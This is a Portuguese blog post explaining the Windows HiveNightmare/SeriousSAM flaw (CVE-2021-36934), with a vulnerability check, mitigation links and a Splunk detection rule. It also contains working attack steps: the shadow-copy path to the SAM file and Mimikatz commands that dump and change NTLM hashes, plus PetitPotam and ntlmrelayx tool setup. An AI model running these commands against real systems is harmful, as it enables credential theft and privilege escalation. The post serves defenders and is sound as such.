Divulgada no dia 20 deste mês, esta é uma vulnerabilidade que um hacker pode utilizar para alcançar níveis mais elevados de privilégios de uma determinada máquina e por conseguinte se movimentar até alcançar o Active Directory, possibilitando explorar outros níveis de acesso dentro da infraestrutura.
Não há atualização disponível, contudo, a Microsoft lançou uma pequena recomendação para mitigação: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934.
O Windows 11 ainda nem foi lançado, mas a vulnerabilidade SeriousSAM / HiveNightmare da Microsoft relatada recentemente (CVE-2021-36934) afeta a ele e aos atuais sistemas operacionais Windows 10 onipresentes.
Outro link para fonte de pesquisa e exemplo de mitigação:
TESTE BÁSICO
Se o retorno do comando apresentar a tela desta figura 2, o seu ambiente está vulnerável. Sobre a legenda acima, os atributos do resultado do comandos significam que:
(I) - permissão herdada do contêiner pai
RX - racesso para ler e executar
TESTE AVANÇADO
1 - icacls c:\windows\system32\config\sam
2 - Por exemplo, os agentes de ameaças podem usar o seguinte caminho de namespace de dispositivo Win32 para cópias de volume de sombra abaixo para acessar o arquivo SAM por qualquer usuário no computador.
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
3 - Usando essas permissões de arquivo baixas e incorretas, junto com cópias de volume de sombra dos arquivos, o pesquisador de segurança e criador do Mimikatz Benjamin Delpy disse ao BleepingComputer que você poderia facilmente roubar a senha com hash NTLM de uma conta elevada para obter privilégios mais altos.
Esse ataque é demonstrado no vídeo abaixo criado por Delpy e compartilhado com BleepingComputer que mostra Mimikatz usando um hash NTLM para obter privilégios de depuração.
no Mimikatz 2.2.0x64
COMANDO 1:
lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
COMANDO 2:
lsadump::changentlm /user:"Gentil kiwi" /oldntlm:cc36cf7a8514893efccd332446158b1a[tiquete correspondente] /newpassword:password[senha qualquer]
Abra a nova aba ou sessão do mimikatz e digite: privilege::debug
a saída tem que ser algo desete tipo: "Privilege '20' ok".
Ferramentas utilizadas: impacket: git clone https://github.com/ExAndroidDev/impacket cd impacket git checkout ntlmrelayx-adcs-attack python3 -m pip install . Exploit PetitPotam: https://github.com/topotam/PetitPotam Mimikatz: https://github.com/gentilkiwi/mimikat... Mitigação: https://support.microsoft.com/en-us/t... Regra de deteção no formato SPLUNK: index=windows EventCode=4768 Certificate_Issuer_Name=*
Fonte:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
Nenhum comentário:
Postar um comentário
Observação: somente um membro deste blog pode postar um comentário.